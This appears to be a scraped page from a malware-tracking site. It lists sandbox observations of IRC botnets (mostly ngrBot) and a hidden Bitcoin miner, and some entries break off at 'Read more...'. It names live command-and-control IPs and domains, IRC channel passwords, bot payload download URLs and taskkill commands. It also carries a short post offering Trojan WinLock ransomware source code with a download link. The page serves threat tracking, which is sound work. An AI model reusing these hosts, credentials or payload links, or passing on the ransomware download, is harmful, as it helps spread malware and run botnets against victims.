Resolved : [juegalon.com] To [193.107.16.75] Remote Host Port Number 173.208.131.234 80 199.15.234.7 80 65.60.49.28 80 193.107.16.75 1863 PASS ngrBot NICK n{US|XPa}knloiig USER knloiig 0 0 :knloiig JOIN #rjr RjR PRIVMSG #rjr :[DNS]: Blocked 0 domain(s) – Redirected 8 domain(s) PRIVMSG #rjr :[d=”http://173.208.131.234/~dalepapi/ngr18.exe” s=”158208 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataGcxaxg.exe” – Download retries: 0Read more...
kkk.hi5fotos.info(aspergillus mod hosted in Taiwan Taoyuan Taoyuan County Education Network Center)
Resolved : [kkk.hi5fotos.info] To [163.30.129.25] Resolved : [kkk.hi5fotos.info] To [83.169.40.209] Resolved : [kkk.hi5fotos.info] To [58.19.130.52] Remote Host Port Number 163.30.129.25 4042 195.122.131.8 80 89.200.143.50 80 NICK new[USA|XP|COMPUTERNAME]pdnhwod USER hh “” “lol” :hh JOIN #biznew# PONG 422 PRIVMSG #boss :[d=”http://goo.gl/kg5QG”] Error downloading file [e=”12039″] NICK n{US|XPa}cgveoja USER cgveoja 0 0 :cgveoja JOIN #boss ngrBot JOIN #USRead more...
xxxisniperixxx.info(irc bot hosted in United States Willowbrook Psinet Inc)
Remote Host Port Number 154.35.64.119 9425 JOIN #TvT wiggernet PRIVMSG #Info : 9Main 9>>-
219.148.138.84(ngrBot hosted in China Hebei Chinanet Hebei Province Network)
Resolved : [herbal-roidz.com] To [219.148.138.84] Remote Host Port Number 199.15.234.7 80 70.38.98.236 80 70.38.98.239 80 219.148.138.84 5101 PASS hax0r PRIVMSG #ngme :[d=”http://img105.herosh.com/2011/07/09/982279045.gif” s=”19432 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” – Download retries: 0 * The data identified by the following URLs was then requested from the remote web server: o http://api.wipmania.com/ o http://img102.herosh.com/2011/07/09/166578640.gif oRead more...
72.20.30.105(irc botnet hosted in United States Staminus Communications)
Remote Host Port Number 72.20.30.105 6667 NICK NEW[XX][XP]5576881409 USER 5576 “” “TsGh” :5576 MODE NEW[XX][XP]5576881409 -d JOIN ##released2## PONG :irc.priv8net.com hosting infos: http://whois.domaintools.com/72.20.30.105
91.98.146.3(irc botnet hosted in Iran, Islamic Republic Of Tehran Pars Online)
Remote Host Port Number 91.98.146.3 6667 NICK Ebeling381 USER qugif 0 0 :Ebeling381 USERHOST Ebeling381 MODE Ebeling381 -x+i JOIN ##wtf slut PRIVMSG ##wtf : 8,1-SC@N- Random Port Scan started on 192.168.x.x:135 with a delay of 5 seconds for 0 minutes using 400 threads. PONG :B3E9DE16 hosting infos: http://whois.domaintools.com/91.98.146.3
Trojan Ransom (WinLock) Source Code
From Russia with love another terrible malware More info about this shit here: http://www.google.fr/search?hl=fr&q=Trojan+Ransom+%28WinLock%29++&meta= This version is coded in delphi Download: http://adf.ly/2NFYe
72.20.30.70(ngrBot hosted in United States Staminus Communications)
Remote Host Port Number 199.15.234.7 80 59.120.20.43 80 72.20.30.70 7475 PASS ngrBot NICK n{US|XPa}obsduin USER obsduin 0 0 :obsduin JOIN ##cybercenter## ngrBot JOIN #US PRIVMSG ##cybercenter## :[DNS]: Blocked 0 domain(s) – Redirected 24 domain(s) hosting infos: http://whois.domaintools.com/72.20.30.70
x.miners.in(Silent Bitcoin Miner)
Resolved : [x.miners.in] To [66.228.53.52] Resolved : [x.miners.in] To [66.228.53.5] Resolved : [x.miners.in] To [66.228.53.56] Resolved : [x.miners.in] To [66.228.53.55] Resolved : [x.miners.in] To [173.255.204.19] Resolved : [x.miners.in] To [96.126.112.223] Resolved : [x.miners.in] To [96.126.112.23] Resolved : [x.miners.in] To [173.255.202.228] ping -n 15 127.0.0.1 taskkill /f /im cgminer.exe taskkill /f /im svchoost.exe taskkill /f /imRead more...
Sabukenke.com(ngrBot hosted in Germany Rapidswitch Ltd)
Resolved : [Sabukenke.com] To [78.129.229.120] Remote Host Port Number 199.115.229.186 80 199.15.234.7 80 78.129.229.120 7777 PASS laekin0505x NICK n{US|XPa}zcmlqxw USER zcmlqxw 0 0 :zcmlqxw JOIN #totalrenovation2011 ngrBot PRIVMSG #totalrenovation2011 :[d=”http://199.115.229.186/~cirrus13/1100New.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataMcxaxm.exe” – Download retries: 0 hosting infos: http://whois.domaintools.com/78.129.229.120